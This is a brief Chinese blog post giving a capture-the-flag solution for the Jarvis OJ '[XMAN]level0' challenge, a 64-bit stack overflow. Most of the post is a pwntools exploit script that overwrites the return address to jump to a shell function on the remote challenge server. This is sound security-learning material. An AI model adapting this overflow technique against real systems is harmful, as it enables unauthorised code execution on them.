[XMAN]level0

nc pwn2.jarvisoj.com 9881

 



level0.b9ded3801d6dd36a97468e128b81a65d

 

64位栈溢出

exp如下:

from pwn import *

#io = process('./level0')
io = remote('pwn2.jarvisoj.com', 9881)

io.recvuntil('Hello, World\n')
payload = b'a' * 136 + p64(0x400596)
io.send(payload)

io.interactive()

 

posted @ 2021-07-17 16:39  hktk1643  阅读(61)  评论(0编辑  收藏  举报